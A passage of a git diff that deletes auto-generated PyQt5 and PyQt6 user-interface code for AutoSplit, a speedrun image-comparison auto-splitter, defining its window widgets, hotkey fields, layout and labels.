self.setpausehotkeyButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.setpausehotkeyButton.setObjectName(_fromUtf8("setpausehotkeyButton")) - self.line_live_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_live_bottom.setGeometry(QtCore.QRect(111, 247, 240, 2)) - self.line_live_bottom.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_live_bottom.setLineWidth(1) - self.line_live_bottom.setFrameShape(QtWidgets.QFrame.HLine) - self.line_live_bottom.setObjectName(_fromUtf8("line_live_bottom")) - self.line_live_top = QtWidgets.QFrame(self.centralwidget) - self.line_live_top.setGeometry(QtCore.QRect(111, 68, 240, 2)) - self.line_live_top.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_live_top.setLineWidth(1) - self.line_live_top.setFrameShape(QtWidgets.QFrame.HLine) - self.line_live_top.setObjectName(_fromUtf8("line_live_top")) - self.line_live_right = QtWidgets.QFrame(self.centralwidget) - self.line_live_right.setGeometry(QtCore.QRect(349, 69, 2, 180)) - self.line_live_right.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_live_right.setLineWidth(1) - self.line_live_right.setFrameShape(QtWidgets.QFrame.VLine) - self.line_live_right.setObjectName(_fromUtf8("line_live_right")) - self.line_left = QtWidgets.QFrame(self.centralwidget) - self.line_left.setGeometry(QtCore.QRect(234, 296, 2, 163)) - self.line_left.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_left.setLineWidth(1) - self.line_left.setFrameShape(QtWidgets.QFrame.VLine) - self.line_left.setObjectName(_fromUtf8("line_left")) - self.line_live_left = QtWidgets.QFrame(self.centralwidget) - self.line_live_left.setGeometry(QtCore.QRect(110, 69, 2, 180)) - 
self.line_live_left.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_live_left.setLineWidth(1) - self.line_live_left.setFrameShape(QtWidgets.QFrame.VLine) - self.line_live_left.setObjectName(_fromUtf8("line_live_left")) - self.line_split_left = QtWidgets.QFrame(self.centralwidget) - self.line_split_left.setGeometry(QtCore.QRect(360, 69, 2, 180)) - self.line_split_left.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_split_left.setLineWidth(1) - self.line_split_left.setFrameShape(QtWidgets.QFrame.VLine) - self.line_split_left.setObjectName(_fromUtf8("line_split_left")) - self.line_split_right = QtWidgets.QFrame(self.centralwidget) - self.line_split_right.setGeometry(QtCore.QRect(599, 69, 2, 180)) - self.line_split_right.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_split_right.setLineWidth(1) - self.line_split_right.setFrameShape(QtWidgets.QFrame.VLine) - self.line_split_right.setObjectName(_fromUtf8("line_split_right")) - self.line_split_top = QtWidgets.QFrame(self.centralwidget) - self.line_split_top.setGeometry(QtCore.QRect(361, 68, 240, 2)) - self.line_split_top.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_split_top.setLineWidth(1) - self.line_split_top.setFrameShape(QtWidgets.QFrame.HLine) - self.line_split_top.setObjectName(_fromUtf8("line_split_top")) - self.line_split_bottom = QtWidgets.QFrame(self.centralwidget) - self.line_split_bottom.setGeometry(QtCore.QRect(361, 247, 240, 2)) - self.line_split_bottom.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_split_bottom.setLineWidth(1) - self.line_split_bottom.setFrameShape(QtWidgets.QFrame.HLine) - self.line_split_bottom.setObjectName(_fromUtf8("line_split_bottom")) - self.timerglobalhotkeysLabel = QtWidgets.QLabel(self.centralwidget) - self.timerglobalhotkeysLabel.setGeometry(QtCore.QRect(313, 293, 101, 20)) - self.timerglobalhotkeysLabel.setObjectName(_fromUtf8("timerglobalhotkeysLabel")) - self.line_right = QtWidgets.QFrame(self.centralwidget) - self.line_right.setGeometry(QtCore.QRect(489, 296, 2, 163)) - self.line_right.setFrameShadow(QtWidgets.QFrame.Plain) - self.line_right.setLineWidth(1) - self.line_right.setFrameShape(QtWidgets.QFrame.VLine) - self.line_right.setObjectName(_fromUtf8("line_right")) - self.liveImage = QtWidgets.QLabel(self.centralwidget) - self.liveImage.setGeometry(QtCore.QRect(111, 69, 240, 180)) - self.liveImage.setText(_fromUtf8("")) - self.liveImage.setObjectName(_fromUtf8("liveImage")) - self.currentSplitImage = QtWidgets.QLabel(self.centralwidget) - self.currentSplitImage.setGeometry(QtCore.QRect(361, 69, 240, 180)) - self.currentSplitImage.setText(_fromUtf8("")) - self.currentSplitImage.setObjectName(_fromUtf8("currentSplitImage")) - self.currentsplitimageLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimageLabel.setAlignment(QtCore.Qt.AlignCenter) - self.currentsplitimageLabel.setGeometry(QtCore.QRect(370, 50, 221, 20)) - self.currentsplitimageLabel.setObjectName(_fromUtf8("currentsplitimageLabel")) - self.imageloopLabel = QtWidgets.QLabel(self.centralwidget) - self.imageloopLabel.setGeometry(QtCore.QRect(362, 251, 108, 20)) - self.imageloopLabel.setObjectName(_fromUtf8("Image Loop #:")) - self.widthLabel = QtWidgets.QLabel(self.centralwidget) - self.widthLabel.setGeometry(QtCore.QRect(14, 177, 31, 16)) - self.widthLabel.setObjectName(_fromUtf8("widthLabel")) - self.heightLabel = QtWidgets.QLabel(self.centralwidget) - self.heightLabel.setGeometry(QtCore.QRect(68, 177, 31, 16)) - self.heightLabel.setObjectName(_fromUtf8("heightLabel")) - self.fpsvalueLabel = 
QtWidgets.QLabel(self.centralwidget) - self.fpsvalueLabel.setGeometry(QtCore.QRect(58, 225, 26, 20)) - self.fpsvalueLabel.setText(_fromUtf8("")) - self.fpsvalueLabel.setObjectName(_fromUtf8("fpsvalueLabel")) - self.widthSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.widthSpinBox.setGeometry(QtCore.QRect(6, 193, 44, 22)) - self.widthSpinBox.setMinimum(1) - self.widthSpinBox.setMaximum(10000) - self.widthSpinBox.setProperty("value", 640) - self.widthSpinBox.setObjectName(_fromUtf8("widthSpinBox")) - self.heightSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.heightSpinBox.setGeometry(QtCore.QRect(62, 193, 44, 22)) - self.heightSpinBox.setMinimum(1) - self.heightSpinBox.setMaximum(10000) - self.heightSpinBox.setProperty("value", 480) - self.heightSpinBox.setObjectName(_fromUtf8("heightSpinBox")) - self.captureregionLabel = QtWidgets.QLabel(self.centralwidget) - self.captureregionLabel.setGeometry(QtCore.QRect(192, 50, 81, 16)) - self.captureregionLabel.setObjectName(_fromUtf8("captureregionLabel")) - self.fpslimitLabel = QtWidgets.QLabel(self.centralwidget) - self.fpslimitLabel.setGeometry(QtCore.QRect(8, 251, 51, 16)) - self.fpslimitLabel.setObjectName(_fromUtf8("fpslimitLabel")) - self.fpslimitSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.fpslimitSpinBox.setGeometry(QtCore.QRect(62, 248, 44, 22)) - self.fpslimitSpinBox.setPrefix(_fromUtf8("")) - self.fpslimitSpinBox.setDecimals(0) - self.fpslimitSpinBox.setMinimum(30.0) - self.fpslimitSpinBox.setMaximum(5000.0) - self.fpslimitSpinBox.setSingleStep(1.0) - self.fpslimitSpinBox.setProperty("value", 60.0) - self.fpslimitSpinBox.setObjectName(_fromUtf8("fpslimitSpinBox")) - self.currentsplitimagefileLabel = QtWidgets.QLabel(self.centralwidget) - self.currentsplitimagefileLabel.setGeometry(QtCore.QRect(362, 271, 237, 20)) - self.currentsplitimagefileLabel.setText(_fromUtf8("")) - self.currentsplitimagefileLabel.setAlignment(QtCore.Qt.AlignCenter) - self.currentsplitimagefileLabel.setObjectName(_fromUtf8("currentsplitimagefileLabel")) - self.takescreenshotButton = QtWidgets.QPushButton(self.centralwidget) - self.takescreenshotButton.setGeometry(QtCore.QRect(250, 251, 91, 21)) - self.takescreenshotButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.takescreenshotButton.setObjectName(_fromUtf8("takescreenshotButton")) - self.xSpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.xSpinBox.setGeometry(QtCore.QRect(6, 154, 44, 22)) - self.xSpinBox.setReadOnly(False) - self.xSpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.UpDownArrows) - self.xSpinBox.setMinimum(0) - self.xSpinBox.setMaximum(999999999) - self.xSpinBox.setSingleStep(1) - self.xSpinBox.setProperty("value", 0) - self.xSpinBox.setObjectName(_fromUtf8("xSpinBox")) - self.ySpinBox = QtWidgets.QSpinBox(self.centralwidget) - self.ySpinBox.setGeometry(QtCore.QRect(62, 154, 44, 22)) - self.ySpinBox.setReadOnly(False) - self.ySpinBox.setButtonSymbols(QtWidgets.QAbstractSpinBox.UpDownArrows) - self.ySpinBox.setMinimum(0) - self.ySpinBox.setMaximum(999999999) - self.ySpinBox.setProperty("value", 0) - self.ySpinBox.setObjectName(_fromUtf8("ySpinBox")) - self.yLabel = QtWidgets.QLabel(self.centralwidget) - self.yLabel.setGeometry(QtCore.QRect(81, 139, 7, 16)) - self.yLabel.setObjectName(_fromUtf8("yLabel")) - self.comparisonmethodComboBox = QtWidgets.QComboBox(self.centralwidget) - self.comparisonmethodComboBox.setGeometry(QtCore.QRect(143, 299, 81, 22)) - self.comparisonmethodComboBox.setObjectName(_fromUtf8("comparisonmethodComboBox")) - 
self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.comparisonmethodComboBox.addItem(_fromUtf8("")) - self.pauseDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.pauseDoubleSpinBox.setGeometry(QtCore.QRect(160, 425, 64, 22)) - self.pauseDoubleSpinBox.setMaximum(999999999.0) - self.pauseDoubleSpinBox.setSingleStep(1.0) - self.pauseDoubleSpinBox.setProperty("value", 10.0) - self.pauseDoubleSpinBox.setObjectName(_fromUtf8("pauseDoubleSpinBox")) - self.custompausetimesCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.custompausetimesCheckBox.setEnabled(True) - self.custompausetimesCheckBox.setGeometry(QtCore.QRect(10, 435, 121, 17)) - self.custompausetimesCheckBox.setWhatsThis(_fromUtf8("")) - self.custompausetimesCheckBox.setChecked(False) - self.custompausetimesCheckBox.setTristate(False) - self.custompausetimesCheckBox.setObjectName(_fromUtf8("custompausetimesCheckBox")) - self.customthresholdsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.customthresholdsCheckBox.setEnabled(True) - self.customthresholdsCheckBox.setGeometry(QtCore.QRect(10, 394, 111, 17)) - self.customthresholdsCheckBox.setWhatsThis(_fromUtf8("")) - self.customthresholdsCheckBox.setChecked(False) - self.customthresholdsCheckBox.setTristate(False) - self.customthresholdsCheckBox.setObjectName(_fromUtf8("customthresholdsCheckBox")) - self.comparisonmethodLabel = QtWidgets.QLabel(self.centralwidget) - self.comparisonmethodLabel.setGeometry(QtCore.QRect(10, 300, 101, 16)) - self.comparisonmethodLabel.setObjectName(_fromUtf8("comparisonmethodLabel")) - self.alignregionButton = QtWidgets.QPushButton(self.centralwidget) - self.alignregionButton.setGeometry(QtCore.QRect(5, 92, 101, 23)) - self.alignregionButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.alignregionButton.setObjectName(_fromUtf8("alignregionButton")) - self.groupDummySplitsCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.groupDummySplitsCheckBox.setGeometry(QtCore.QRect(252, 440, 230, 17)) - self.groupDummySplitsCheckBox.setChecked(False) - self.groupDummySplitsCheckBox.setObjectName(_fromUtf8("groupDummySplitsCheckBox")) - self.selectwindowButton = QtWidgets.QPushButton(self.centralwidget) - self.selectwindowButton.setGeometry(QtCore.QRect(5, 117, 101, 23)) - self.selectwindowButton.setFocusPolicy(QtCore.Qt.NoFocus) - self.selectwindowButton.setObjectName(_fromUtf8("selectwindowButton")) - self.splitimagefolderLabel.raise_() - self.splitimagefolderLineEdit.raise_() - self.browseButton.raise_() - self.xLabel.raise_() - self.liveimageCheckBox.raise_() - self.loopCheckBox.raise_() - self.autostartonresetCheckBox.raise_() - self.selectregionButton.raise_() - self.similaritythresholdLabel.raise_() - self.similaritythresholdDoubleSpinBox.raise_() - self.startautosplitterButton.raise_() - self.resetButton.raise_() - self.undosplitButton.raise_() - self.skipsplitButton.raise_() - self.pauseLabel.raise_() - self.checkfpsButton.raise_() - self.fpsLabel.raise_() - self.showlivesimilarityCheckBox.raise_() - self.showhighestsimilarityCheckBox.raise_() - self.livesimilarityLabel.raise_() - self.highestsimilarityLabel.raise_() - self.splitLabel.raise_() - self.resetLabel.raise_() - self.skiptsplitLabel.raise_() - self.undosplitLabel.raise_() - self.pausehotkeyLabel.raise_() - self.splitLineEdit.raise_() - self.undosplitLineEdit.raise_() - self.skipsplitLineEdit.raise_() - self.resetLineEdit.raise_() - self.pausehotkeyLineEdit.raise_() - self.setsplithotkeyButton.raise_() - 
self.setresethotkeyButton.raise_() - self.setskipsplithotkeyButton.raise_() - self.setundosplithotkeyButton.raise_() - self.setpausehotkeyButton.raise_() - self.line_live_bottom.raise_() - self.line_live_top.raise_() - self.line_live_right.raise_() - self.line_left.raise_() - self.line_live_left.raise_() - self.line_split_left.raise_() - self.line_split_right.raise_() - self.line_split_top.raise_() - self.line_split_bottom.raise_() - self.timerglobalhotkeysLabel.raise_() - self.line_right.raise_() - self.currentsplitimageLabel.raise_() - self.imageloopLabel.raise_() - self.liveImage.raise_() - self.currentSplitImage.raise_() - self.widthLabel.raise_() - self.heightLabel.raise_() - self.fpsvalueLabel.raise_() - self.widthSpinBox.raise_() - self.heightSpinBox.raise_() - self.captureregionLabel.raise_() - self.fpslimitLabel.raise_() - self.fpslimitSpinBox.raise_() - self.currentsplitimagefileLabel.raise_() - self.takescreenshotButton.raise_() - self.xSpinBox.raise_() - self.ySpinBox.raise_() - self.yLabel.raise_() - self.comparisonmethodComboBox.raise_() - self.pauseDoubleSpinBox.raise_() - self.custompausetimesCheckBox.raise_() - self.customthresholdsCheckBox.raise_() - self.comparisonmethodLabel.raise_() - self.alignregionButton.raise_() - self.groupDummySplitsCheckBox.raise_() - self.selectwindowButton.raise_() - MainWindow.setCentralWidget(self.centralwidget) - self.menuBar = QtWidgets.QMenuBar(MainWindow) - self.menuBar.setGeometry(QtCore.QRect(0, 0, 612, 21)) - self.menuBar.setObjectName(_fromUtf8("menuBar")) - self.menuFile = QtWidgets.QMenu(self.menuBar) - self.menuFile.setObjectName(_fromUtf8("menuFile")) - self.menuHelp = QtWidgets.QMenu(self.menuBar) - self.menuHelp.setObjectName(_fromUtf8("menuHelp")) - MainWindow.setMenuBar(self.menuBar) - self.actionView_Help = QtWidgets.QAction(MainWindow) - self.actionView_Help.setObjectName(_fromUtf8("actionView_Help")) - self.actionAbout = QtWidgets.QAction(MainWindow) - self.actionAbout.setObjectName(_fromUtf8("actionAbout")) - self.actionSave_Settings = QtWidgets.QAction(MainWindow) - self.actionSave_Settings.setObjectName(_fromUtf8("actionSave_Settings")) - self.actionSave_Settings_As = QtWidgets.QAction(MainWindow) - self.actionSave_Settings_As.setObjectName(_fromUtf8("actionSave_Settings_As")) - self.actionLoad_Settings = QtWidgets.QAction(MainWindow) - self.actionLoad_Settings.setObjectName(_fromUtf8("actionLoad_Settings")) - self.menuHelp.addAction(self.actionView_Help) - self.menuHelp.addAction(self.actionAbout) - self.menuFile.addAction(self.actionSave_Settings) - self.menuFile.addAction(self.actionSave_Settings_As) - self.menuFile.addAction(self.actionLoad_Settings) - self.menuBar.addAction(self.menuFile.menuAction()) - self.menuBar.addAction(self.menuHelp.menuAction()) - - self.retranslateUi(MainWindow) - QtCore.QMetaObject.connectSlotsByName(MainWindow) - MainWindow.setTabOrder(self.splitimagefolderLineEdit, self.xSpinBox) - MainWindow.setTabOrder(self.xSpinBox, self.ySpinBox) - MainWindow.setTabOrder(self.ySpinBox, self.widthSpinBox) - MainWindow.setTabOrder(self.widthSpinBox, self.heightSpinBox) - MainWindow.setTabOrder(self.heightSpinBox, self.fpslimitSpinBox) - MainWindow.setTabOrder(self.fpslimitSpinBox, self.liveimageCheckBox) - MainWindow.setTabOrder(self.liveimageCheckBox, self.comparisonmethodComboBox) - MainWindow.setTabOrder(self.comparisonmethodComboBox, self.showlivesimilarityCheckBox) - MainWindow.setTabOrder(self.showlivesimilarityCheckBox, self.showhighestsimilarityCheckBox) - 
MainWindow.setTabOrder(self.showhighestsimilarityCheckBox, self.customthresholdsCheckBox) - MainWindow.setTabOrder(self.customthresholdsCheckBox, self.similaritythresholdDoubleSpinBox) - MainWindow.setTabOrder(self.similaritythresholdDoubleSpinBox, self.custompausetimesCheckBox) - MainWindow.setTabOrder(self.custompausetimesCheckBox, self.pauseDoubleSpinBox) - MainWindow.setTabOrder(self.pauseDoubleSpinBox, self.splitLineEdit) - MainWindow.setTabOrder(self.splitLineEdit, self.resetLineEdit) - MainWindow.setTabOrder(self.resetLineEdit, self.skipsplitLineEdit) - MainWindow.setTabOrder(self.skipsplitLineEdit, self.undosplitLineEdit) - MainWindow.setTabOrder(self.undosplitLineEdit, self.pausehotkeyLineEdit) - MainWindow.setTabOrder(self.pausehotkeyLineEdit, self.groupDummySplitsCheckBox) - MainWindow.setTabOrder(self.groupDummySplitsCheckBox, self.loopCheckBox) - MainWindow.setTabOrder(self.loopCheckBox, self.autostartonresetCheckBox) - - def retranslateUi(self, MainWindow): - MainWindow.setWindowTitle(_translate("MainWindow", "AutoSplit", None)) - self.splitimagefolderLabel.setText(_translate("MainWindow", "Split Image Folder:", None)) - self.browseButton.setText(_translate("MainWindow", "Browse..", None)) - self.xLabel.setText(_translate("MainWindow", "X", None)) - self.liveimageCheckBox.setText(_translate("MainWindow", "Live Capture Region", None)) - self.loopCheckBox.setText(_translate("MainWindow", "Loop Split Images", None)) - self.autostartonresetCheckBox.setText(_translate("MainWindow", "Auto Start On Reset", None)) - self.selectregionButton.setText(_translate("MainWindow", "Select Region", None)) - self.similaritythresholdLabel.setText(_translate("MainWindow", "Similarity threshold", None)) - self.startautosplitterButton.setText(_translate("MainWindow", "Start Auto Splitter", None)) - self.resetButton.setText(_translate("MainWindow", "Reset", None)) - self.undosplitButton.setText(_translate("MainWindow", "Undo Split", None)) - self.skipsplitButton.setText(_translate("MainWindow", "Skip Split", None)) - self.pauseLabel.setText(_translate("MainWindow", "Pause time after split (sec)", None)) - self.checkfpsButton.setText(_translate("MainWindow", "Max FPS", None)) - self.fpsLabel.setText(_translate("MainWindow", "FPS", None)) - self.showlivesimilarityCheckBox.setText(_translate("MainWindow", "Show live similarity", None)) - self.showhighestsimilarityCheckBox.setText(_translate("MainWindow", "Show highest similarity", None)) - self.splitLabel.setText(_translate("MainWindow", "Start / Split", None)) - self.resetLabel.setText(_translate("MainWindow", "Reset", None)) - self.skiptsplitLabel.setText(_translate("MainWindow", "Skip Split", None)) - self.undosplitLabel.setText(_translate("MainWindow", "Undo Split", None)) - self.pausehotkeyLabel.setText(_translate("MainWindow", "Pause", None)) - self.setsplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setresethotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setskipsplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setundosplithotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.setpausehotkeyButton.setText(_translate("MainWindow", "Set Hotkey", None)) - self.timerglobalhotkeysLabel.setText(_translate("MainWindow", "Timer Global Hotkeys", None)) - self.currentsplitimageLabel.setText(_translate("MainWindow", "Current Split Image", None)) - self.imageloopLabel.setText(_translate("MainWindow", "Image Loop #:", None)) - 
self.widthLabel.setText(_translate("MainWindow", "Width", None)) - self.heightLabel.setText(_translate("MainWindow", "Height", None)) - self.captureregionLabel.setText(_translate("MainWindow", "Capture Region", None)) - self.fpslimitLabel.setText(_translate("MainWindow", "FPS Limit:", None)) - self.takescreenshotButton.setText(_translate("MainWindow", "Take Screenshot", None)) - self.yLabel.setText(_translate("MainWindow", "Y", None)) - self.comparisonmethodComboBox.setItemText(0, _translate("MainWindow", "L2 Norm", None)) - self.comparisonmethodComboBox.setItemText(1, _translate("MainWindow", "Histograms", None)) - self.comparisonmethodComboBox.setItemText(2, _translate("MainWindow", "pHash", None)) - self.custompausetimesCheckBox.setText(_translate("MainWindow", "Custom pause times", None)) - self.customthresholdsCheckBox.setText(_translate("MainWindow", "Custom thresholds", None)) - self.comparisonmethodLabel.setText(_translate("MainWindow", "Comparison Method", None)) - self.alignregionButton.setText(_translate("MainWindow", "Align Region", None)) - self.groupDummySplitsCheckBox.setText(_translate("MainWindow", "Group dummy splits when undoing/skipping", None)) - self.selectwindowButton.setText(_translate("MainWindow", "Select Window", None)) - self.menuHelp.setTitle(_translate("MainWindow", "Help", None)) - self.menuFile.setTitle(_translate("MainWindow", "File", None)) - self.actionView_Help.setText(_translate("MainWindow", "View Help", None)) - self.actionAbout.setText(_translate("MainWindow", "About", None)) - self.actionSave_Settings.setText(_translate("MainWindow", "Save Settings", None)) - self.actionSave_Settings_As.setText(_translate("MainWindow", "Save Settings As...", None)) - self.actionLoad_Settings.setText(_translate("MainWindow", "Load Settings", None)) - - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - MainWindow = QtWidgets.QMainWindow() - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() - sys.exit(app.exec_()) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.target.py deleted file mode 100644 index 992438a..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$design.py.target.py +++ /dev/null @@ -1,563 +0,0 @@ -# -*- coding: utf-8 -*- - -# Form implementation generated from reading ui file 'design.ui' -# -# Created by: PyQt6 UI code generator 4.11.4 -# -# WARNING! All changes made in this file will be lost! 
- -from PyQt6 import QtCore, QtGui, QtWidgets - -try: - _fromUtf8 = QtCore.QString.fromUtf8 -except AttributeError: - def _fromUtf8(s): - return s - -try: - _encoding = QtWidgets.QApplication.UnicodeUTF8 - - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig, _encoding) -except AttributeError: - def _translate(context, text, disambig): - return QtWidgets.QApplication.translate(context, text, disambig) - - -class Ui_MainWindow(object): - def setupUi(self, MainWindow): - MainWindow.setObjectName(_fromUtf8("MainWindow")) - MainWindow.resize(612, 490) - sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Policy.Fixed, QtWidgets.QSizePolicy.Policy.Fixed) - sizePolicy.setHorizontalStretch(0) - sizePolicy.setVerticalStretch(0) - sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth()) - MainWindow.setSizePolicy(sizePolicy) - MainWindow.setMinimumSize(QtCore.QSize(622, 490)) - MainWindow.setMaximumSize(QtCore.QSize(622, 490)) - icon = QtGui.QIcon() - icon.addPixmap(QtGui.QPixmap(_fromUtf8("../../VideoAutoSplitter/icon.ico")), QtGui.QIcon.Mode.Normal, QtGui.QIcon.State.Off) - MainWindow.setWindowIcon(icon) - MainWindow.setWhatsThis(_fromUtf8("")) - MainWindow.setLayoutDirection(QtCore.Qt.LayoutDirection.LeftToRight) - self.centralwidget = QtWidgets.QWidget(MainWindow) - self.centralwidget.setObjectName(_fromUtf8("centralwidget")) - self.splitimagefolderLabel = QtWidgets.QLabel(self.centralwidget) - self.splitimagefolderLabel.setGeometry(QtCore.QRect(90, 13, 91, 16)) - self.splitimagefolderLabel.setObjectName(_fromUtf8("splitimagefolderLabel")) - self.splitimagefolderLineEdit = QtWidgets.QLineEdit(self.centralwidget) - self.splitimagefolderLineEdit.setGeometry(QtCore.QRect(187, 11, 247, 20)) - self.splitimagefolderLineEdit.setReadOnly(True) - self.splitimagefolderLineEdit.setObjectName(_fromUtf8("splitimagefolderLineEdit")) - self.browseButton = QtWidgets.QPushButton(self.centralwidget) - self.browseButton.setGeometry(QtCore.QRect(443, 9, 75, 24)) - self.browseButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.browseButton.setObjectName(_fromUtf8("browseButton")) - self.xLabel = QtWidgets.QLabel(self.centralwidget) - self.xLabel.setGeometry(QtCore.QRect(25, 139, 7, 16)) - self.xLabel.setObjectName(_fromUtf8("xLabel")) - self.liveimageCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.liveimageCheckBox.setEnabled(True) - self.liveimageCheckBox.setGeometry(QtCore.QRect(125, 253, 121, 17)) - self.liveimageCheckBox.setChecked(True) - self.liveimageCheckBox.setTristate(False) - self.liveimageCheckBox.setObjectName(_fromUtf8("liveimageCheckBox")) - self.loopCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.loopCheckBox.setEnabled(True) - self.loopCheckBox.setGeometry(QtCore.QRect(500, 314, 121, 17)) - self.loopCheckBox.setChecked(False) - self.loopCheckBox.setTristate(False) - self.loopCheckBox.setObjectName(_fromUtf8("loopCheckBox")) - self.autostartonresetCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.autostartonresetCheckBox.setEnabled(True) - self.autostartonresetCheckBox.setGeometry(QtCore.QRect(500, 344, 121, 17)) - self.autostartonresetCheckBox.setChecked(False) - self.autostartonresetCheckBox.setTristate(False) - self.autostartonresetCheckBox.setObjectName(_fromUtf8("autostartonresetCheckBox")) - self.selectregionButton = QtWidgets.QPushButton(self.centralwidget) - self.selectregionButton.setGeometry(QtCore.QRect(5, 67, 101, 23)) - 
self.selectregionButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.selectregionButton.setObjectName(_fromUtf8("selectregionButton")) - self.similaritythresholdLabel = QtWidgets.QLabel(self.centralwidget) - self.similaritythresholdLabel.setGeometry(QtCore.QRect(10, 378, 91, 16)) - self.similaritythresholdLabel.setObjectName(_fromUtf8("similaritythresholdLabel")) - self.similaritythresholdDoubleSpinBox = QtWidgets.QDoubleSpinBox(self.centralwidget) - self.similaritythresholdDoubleSpinBox.setGeometry(QtCore.QRect(160, 383, 64, 22)) - self.similaritythresholdDoubleSpinBox.setMaximum(1.0) - self.similaritythresholdDoubleSpinBox.setSingleStep(0.01) - self.similaritythresholdDoubleSpinBox.setProperty("value", 0.9) - self.similaritythresholdDoubleSpinBox.setObjectName(_fromUtf8("similaritythresholdDoubleSpinBox")) - self.startautosplitterButton = QtWidgets.QPushButton(self.centralwidget) - self.startautosplitterButton.setGeometry(QtCore.QRect(506, 425, 101, 31)) - self.startautosplitterButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.startautosplitterButton.setObjectName(_fromUtf8("startautosplitterButton")) - self.resetButton = QtWidgets.QPushButton(self.centralwidget) - self.resetButton.setGeometry(QtCore.QRect(506, 385, 101, 31)) - self.resetButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.resetButton.setObjectName(_fromUtf8("resetButton")) - self.undosplitButton = QtWidgets.QPushButton(self.centralwidget) - self.undosplitButton.setGeometry(QtCore.QRect(477, 251, 61, 21)) - self.undosplitButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.undosplitButton.setObjectName(_fromUtf8("undosplitButton")) - self.skipsplitButton = QtWidgets.QPushButton(self.centralwidget) - self.skipsplitButton.setGeometry(QtCore.QRect(541, 251, 61, 21)) - self.skipsplitButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.skipsplitButton.setObjectName(_fromUtf8("skipsplitButton")) - self.pauseLabel = QtWidgets.QLabel(self.centralwidget) - self.pauseLabel.setGeometry(QtCore.QRect(10, 420, 140, 16)) - self.pauseLabel.setObjectName(_fromUtf8("pauseLabel")) - self.checkfpsButton = QtWidgets.QPushButton(self.centralwidget) - self.checkfpsButton.setGeometry(QtCore.QRect(5, 225, 51, 21)) - self.checkfpsButton.setFocusPolicy(QtCore.Qt.FocusPolicy.NoFocus) - self.checkfpsButton.setObjectName(_fromUtf8("checkfpsButton")) - self.fpsLabel = QtWidgets.QLabel(self.centralwidget) - self.fpsLabel.setGeometry(QtCore.QRect(87, 225, 20, 20)) - self.fpsLabel.setObjectName(_fromUtf8("fpsLabel")) - self.showlivesimilarityCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.showlivesimilarityCheckBox.setEnabled(True) - self.showlivesimilarityCheckBox.setGeometry(QtCore.QRect(10, 330, 111, 17)) - self.showlivesimilarityCheckBox.setChecked(True) - self.showlivesimilarityCheckBox.setTristate(False) - self.showlivesimilarityCheckBox.setObjectName(_fromUtf8("showlivesimilarityCheckBox")) - self.showhighestsimilarityCheckBox = QtWidgets.QCheckBox(self.centralwidget) - self.showhighestsimilarityCheckBox.setEnabled(True) - self.showhighestsimilarityCheckBox.setGeometry(QtCore.QRect(10, 351, 131, 17)) - self.showhighestsimilarityCheckBox.setChecked(True) - self.showhighestsimilarityCheckBox.setTristate(False) - self.showhighestsimilarityCheckBox.setObjectName(_fromUtf8("showhighestsimilarityCheckBox")) - self.livesimilarityLabel = QtWidgets.QLabel(self.centralwidget) - self.livesimilarityLabel.setGeometry(QtCore.QRect(160, 332, 46, 13)) - self.livesimilarityLabel.setText(_fromUtf8("")) - 
